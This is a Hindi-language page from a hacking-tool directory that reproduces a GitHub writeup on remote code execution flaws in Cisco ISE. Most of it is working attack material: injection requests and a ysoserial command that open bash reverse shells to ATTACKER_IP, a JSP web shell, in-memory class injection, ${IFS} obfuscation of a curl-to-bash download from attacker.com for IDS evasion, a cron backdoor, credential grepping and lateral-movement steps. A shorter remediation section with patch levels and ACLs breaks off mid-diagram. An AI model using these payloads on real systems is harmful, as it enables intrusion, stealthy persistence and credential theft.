Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20180 — सिस्को ISE RCE कमजोरियों का गहन तकनीकी विश्लेषण, जिसमें सुरक्षा शोधकर्ताओं और पैठ परीक्षकों के लिए शोषण तकनीकें, चोरी-छिपे तरीके, और उपचार रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/kaleth4/cve-2026-20180
टोहीभेद्यता विश्लेषणशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubkaleth4/cve-2026-20180

CVE-2026-20180

सिस्को ISE RCE कमजोरियों का गहन तकनीकी विश्लेषण, जिसमें सुरक्षा शोधकर्ताओं और पैठ परीक्षकों के लिए शोषण तकनीकें, चोरी-छिपे तरीके, और उपचार रणनीतियाँ शामिल हैं।

14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

Cisco ISE RCE: उन्नत शोषण और उपचार विश्लेषण

📋 विषय-सूची

  1. कार्यकारी सारांश
  2. हमले की सतह का विश्लेषण
  3. शोषण वेक्टर
  4. उन्नत चोरी तकनीकें
  5. ज़ीरो ट्रस्ट आर्किटेक्चर पर प्रणालीगत प्रभाव
  6. उपचार रणनीति
  7. फोरेंसिक जांच
  8. संदर्भ

🎯 कार्यकारी सारांश

Cisco Identity Services Engine (ISE) में रिमोट कोड निष्पादन (RCE) कमजोरियाँ कॉर्पोरेट परिधि सुरक्षा में एक महत्वपूर्ण विघटन बिंदु का प्रतिनिधित्व करती हैं। एक शीर्ष स्तरीय सुरक्षा शोधकर्ता के लिए, ISE केवल एक प्रमाणीकरण घटक नहीं है: यह मास्टर कुंजी है जो संपूर्ण नेटवर्क अवसंरचना तक पहुंच को नियंत्रित करती है।

गंभीर जोखिम: एक अनधिकृत हमलावर 5 मिनट से भी कम समय में सिस्टम पर पूर्ण नियंत्रण प्राप्त कर सकता है, बिना पारंपरिक निगरानी प्रणालियों में पता लगाने योग्य निशान छोड़े।


🔍 हमले की सतह का विश्लेषण

1.1 NAC में अनधिकृत प्रबंधन API का मूल्यांकन

पहचाने गए कमजोर एंडपॉइंट

सतह का लक्षण वर्णन

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│         CISCO ISE - उजागर NAC आर्किटेक्चर            │
├─────────────────────────────────────────────────────────┤
│                                                          │
│  [इंटरनेट] ──→ [फ़ायरवॉल] ──→ [ISE प्रबंधन पोर्ट]   │
│                                    ↓                     │
│                            [अनधिकृत API]               │
│                                    ↓                     │
│                        [Java Deserialization परत]      │
│                                    ↓                     │
│                        [Tomcat वेब कंटेनर]            │
│                                    ↓                     │
│                        [OS कमांड निष्पादन]            │
│                                    ↓                     │
│                    [पूर्ण नेटवर्क समझौता]            │
│                                                          │
└─────────────────────────────────────────────────────────┘

महत्वपूर्ण निष्कर्ष: /deployment-rpc/ API प्रसंस्करण की प्रारंभिक पंक्तियों में सत्र टोकन सत्यापित नहीं करता, जिससे प्रमाणीकरण का पूर्ण बायपास संभव होता है।


⚡ शोषण वेक्टर

2.1 अनधिकृत API का दुरुपयोग (CVE-2025-20281)

हमले की तकनीक - चरण-दर-चरण

चरण 1: टोही

root@kitploit:~
# पोर्ट और सेवा स्कैनिंग
nmap -sV -p 8443,8080 <ISE_IP>

# RPC एंडपॉइंट की गणना
curl -s https://<ISE_IP>:8443/deployment-rpc/ | grep -i "method"

चरण 2: प्रत्यक्ष शोषण

root@kitploit:~
POST /deployment-rpc/enableStrongSwanTunnel HTTP/1.1
Host: <ISE_IP>:8443
Content-Type: application/json
Content-Length: 287

{
  "tunnelName": "admin",
  "tunnelType": "IPSec",
  "presharedKey": "test",
  "remoteGateway": "127.0.0.1",
  "localSubnet": "0.0.0.0/0",
  "remoteSubnet": "0.0.0.0/0",
  "advancedConfig": "'; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; echo '"
}

परिणाम: root विशेषाधिकारों के साथ मनमाना कमांड निष्पादन (डिफ़ॉल्ट कॉन्फ़िगरेशन में Tomcat उपयोगकर्ता root के रूप में चलता है)।


2.2 Java Deserialization के माध्यम से कमांड इंजेक्शन (CVE-2025-20124)

हमले का तंत्र

root@kitploit:~
[सीरियलाइज़्ड पेलोड] ──→ [API एंडपॉइंट] ──→ [ObjectInputStream.readObject()]
                                                      ↓
                                          [Gadget Chain निष्पादन]
                                                      ↓
                                          [Runtime.exec() आह्वान]

PoC पेलोड (ysoserial का उपयोग करके):

root@kitploit:~
# दुर्भावनापूर्ण gadget chain का निर्माण
java -jar ysoserial.jar CommonsCollections6 \
  'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' | \
  base64 -w 0 > payload.b64

# पेलोड भेजना
curl -X POST https://<ISE_IP>:8443/admin/rest/api/v1/system/config \
  -H "Content-Type: application/octet-stream" \
  --data-binary @payload.b64

प्रभाव: "केवल-पढ़ने" खाते से root तक विशेषाधिकार वृद्धि।


2.3 मनमाना फ़ाइल अपलोड (CVE-2025-20282)

शोषण प्रवाह

root@kitploit:~
[वेब शेल] ──→ [/api/v1/config/upload] ──→ [/opt/CSCOlumos/uploads/]
                                                      ↓
                                    [Tomcat JSP फ़ाइल संसाधित करता है]
                                                      ↓
                                    [root विशेषाधिकारों के साथ निष्पादन]

दुर्भावनापूर्ण वेब शेल उदाहरण:

root@kitploit:~
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd});
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = br.readLine()) != null) {
            out.println(line + "<br>");
        }
    }
%>

बाद में पहुंच:

root@kitploit:~
https://<ISE_IP>:8443/opt/CSCOlumos/uploads/shell.jsp?cmd=id

🥷 उन्नत चोरी तकनीकें

3.1 मेमोरी में वेब शेल (इन-मेमोरी इंजेक्शन)

इंजेक्शन पद्धति

एक शीर्ष स्तरीय हैकर कभी डिस्क पर फ़ाइलें नहीं छोड़ता। मेमोरी इंजेक्शन अदृश्य स्थिरता की तकनीक है:

root@kitploit:~
// Tomcat ClassLoader में इंजेक्शन
ClassLoader loader = Thread.currentThread().getContextClassLoader();
byte[] classBytes = generateMaliciousClass();
Method defineClass = ClassLoader.class.getDeclaredMethod(
    "defineClass", 
    String.class, byte[].class, int.class, int.class
);
defineClass.setAccessible(true);
defineClass.invoke(loader, "EvilClass", classBytes, 0, classBytes.length);

लाभ: पारंपरिक फ़ाइल स्कैन (OSSEC, Tripwire) कुछ भी पता नहीं लगाते।


3.2 ${IFS} के साथ कमांड अस्पष्टीकरण

IDS बायपास तकनीक

root@kitploit:~
# मूल कमांड (पता लगाने योग्य)
curl http://attacker.com/shell.sh | bash

# अस्पष्ट कमांड (IDS चोरी)
c${IFS}url${IFS}http://attacker.com/shell.sh${IFS}|${IFS}bash

# वेरिएबल इंडायरेक्शन के साथ भिन्नता
${PATH:0:1}b${PATH:0:1}n${PATH:0:1}bash${IFS}-c${IFS}'दुर्भावनापूर्ण_कमांड'

यह क्यों काम करता है: पहचान प्रणालियाँ कीवर्ड पैटर्न (curl, bash, |) खोजती हैं। ${IFS} (इंटरनल फील्ड सेपरेटर) का उपयोग bash में अर्थ बदले बिना शब्दों को विभाजित करता है।


3.3 अदृश्य स्थिरता तकनीकें

Cron में बैकडोर (पता लगाने योग्य)

root@kitploit:~
# ❌ पता लगाने योग्य - /etc/cron.d/ में फ़ाइलें
echo "* * * * * root /tmp/malware.sh" > /etc/cron.d/evil

मेमोरी में बैकडोर (अदृश्य)

root@kitploit:~
# ✅ अदृश्य - Tomcat प्रक्रिया में इंजेक्शन
# 1. मेमोरी में netcat लिसनर बनाएं
# 2. JVM में थ्रेड इंजेक्ट करें जो स्थायी कनेक्शन बनाए रखता है
# 3. कोई फ़ाइलें नहीं, कोई दृश्यमान अनाथ प्रक्रियाएँ नहीं

🌐 ज़ीरो ट्रस्ट आर्किटेक्चर पर प्रणालीगत प्रभाव

4.1 ISE समझौता ज़ीरो ट्रस्ट को कैसे तोड़ता है

पूर्ण हमले का परिदृश्य

root@kitploit:~
┌──────────────────────────────────────────────────────────────────┐
│                    मूल ज़ीरो ट्रस्ट आर्किटेक्चर               │
├──────────────────────────────────────────────────────────────────┤
│                                                                   │
│  [उपयोगकर्ता] ──→ [ISE प्रमाणीकरण] ──→ [डिवाइस पोस्चर जांच]  │
│                                              ↓                    │
│                                    [माइक्रो-सेगमेंटेशन नीति]   │
│                                              ↓                    │
│                              [संसाधनों तक सीमित पहुंच]        │
│                                                                   │
└──────────────────────────────────────────────────────────────────┘

                    ⬇️  ISE समझौते के बाद  ⬇️

┌──────────────────────────────────────────────────────────────────┐
│                   समझौता किया गया आर्किथेक्चर                    │
├──────────────────────────────────────────────────────────────────┤
│                                                                   │
│  [हमलावर] ──→ [नियंत्रित ISE] ──→ [संशोधित नीतियाँ]          │
│                                              ↓                    │
│                          [माइक्रो-सेगमेंटेशन अक्षम]            │
│                                              ↓                    │
│                    [नेटवर्क में पूर्ण पार्श्व गति]              │
│                                              ↓                    │
│              [डेटाबेस, सर्वर, IoT तक पहुंच]                    │
│                                                                   │
└──────────────────────────────────────────────────────────────────┘

समझौते के बाद पार्श्व गति

चरण 1: आंतरिक टोही

root@kitploit:~
# समझौता किए गए ISE से, नेटवर्क की गणना करें
nmap -sV -p 22,3306,5432,1433 10.0.0.0/8 --script smb-enum-shares

# ISE में संग्रहीत क्रेडेंशियल निकालें
grep -r "password" /opt/CSCOlumos/config/ | grep -v "^#"

चरण 2: दुर्भावनापूर्ण नीति इंजेक्शन

root@kitploit:~
ISE नीति संशोधन:
├─ छिपा हुआ प्रशासनिक उपयोगकर्ता बनाएं
├─ सेगमेंटेशन नियम संशोधित करें
├─ VLAN के बीच अनधिकृत ट्रैफ़िक की अनुमति दें
└─ DNS ट्रैफ़िक को नियंत्रित सर्वर पर पुनर्निर्देशित करें

चरण 3: स्थिरता और डेटा निष्कासन

root@kitploit:~
निष्कासित डेटा:
├─ सभी प्रमाणित उपयोगकर्ताओं के क्रेडेंशियल
├─ नेटवर्क नीति कॉन्फ़िगरेशन
├─ एक्सेस लॉग (निशान मिटाने के लिए)
├─ आंतरिक SSL/TLS प्रमाणपत्र
└─ IoT डिवाइस और सर्वर जानकारी

🛡️ उपचार रणनीति

5.1 तत्काल कार्रवाई (शमन - पहले 24 घंटे)

5.1.1 महत्वपूर्ण पैचिंग

root@kitploit:~
# वर्तमान संस्करण सत्यापित करें
ssh admin@<ISE_IP>
show version

# कमजोर संस्करण:
# - ISE 3.0.x से 3.2.x (सभी)
# - ISE 3.3.0 से 3.3.6
# - ISE 3.4.0 से 3.4.1

# सुरक्षित संस्करण:
# - ISE 3.3 पैच 7 या उच्चतर
# - ISE 3.4 पैच 2 या उच्चतर
# - ISE 3.5 (जब उपलब्ध हो)

# अद्यतन प्रक्रिया
admin# copy https://<PATCH_SERVER>/ise-3.3.7-patch.tar admin:password
admin# software install ise-3.3.7-patch.tar
admin# reload

5.1.2 तत्काल नेटवर्क अलगाव

root@kitploit:~
! एक्सेस स्विच पर (ISE से पहले)
interface GigabitEthernet0/1
 description ISE-Management
 switchport mode access
 switchport access vlan 999
 spanning-tree portfast
 no shutdown

! समर्पित प्रबंधन VLAN (VRF)
ip vrf MGMT
 description Management VRF - Isolated

interface Vlan999
 ip vrf forwarding MGMT
 ip address 10.255.255.1 255.255.255.0

! ISE के लिए प्रतिबंधात्मक ACL
ip access-list extended ISE-MGMT-ONLY
 permit tcp 10.1.1.0 0.0.0.255 10.255.255.0 0.0.0.255 eq 8443
 permit tcp 10.1.1.0 0.0.0.255 10.255.255.0 0.0.0.255 eq 8080
 deny ip any any log

! ACL लागू करें
interface GigabitEthernet0/1
 ip access-group ISE-MGMT-ONLY in

5.1.3 कमजोर API अक्षम करना (अस्थायी वर्कअराउंड)

root@kitploit:~
# ISE पर SSH
ssh admin@<ISE_IP>

# Tomcat कॉन्फ़िगरेशन तक पहुंच
config t
system
tomcat
 disable-rpc-endpoints yes
 disable-file-upload yes
exit
exit

# Tomcat पुनरारंभ करें
admin# application stop ise
admin# application start ise

5.2 संरचनात्मक उपचार (सप्ताह 1-4)

5.2.1 ISE में ज़ीरो ट्रस्ट कार्यान्वयन

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│         ISE हार्डन्ड आर्किटेक्चर (ज़ीरो ट्रस्ट)        │
├─────────────────────────────────────

**🚨 सुरक्षा रिपोर्ट: Cisco ISE में RCE**
## रेड टीम बनाम ब्लू टीम परिप्रेक्ष्य

> **⚠️ अस्वीकरण:** यह दस्तावेज़ वैध सुरक्षा अनुसंधान, अधिकृत पेनेट्रेशन परीक्षण और रक्षात्मक उपचार के लिए है। बिना प्राधिकरण के कोई भी शोषण अवैध है।
टूल डाउनलोड करें
CVEएंडपॉइंटविधिप्रमाणीकरणगंभीरता
CVE-2025-20281/deployment-rpc/enableStrongSwanTunnelPOST❌ कोई नहींगंभीर
CVE-2025-20282/api/v1/config/uploadPOST⚠️ कमजोरगंभीर
CVE-2025-20124/admin/rest/api/v1/system/configGET/POST⚠️ बायपास संभवगंभीर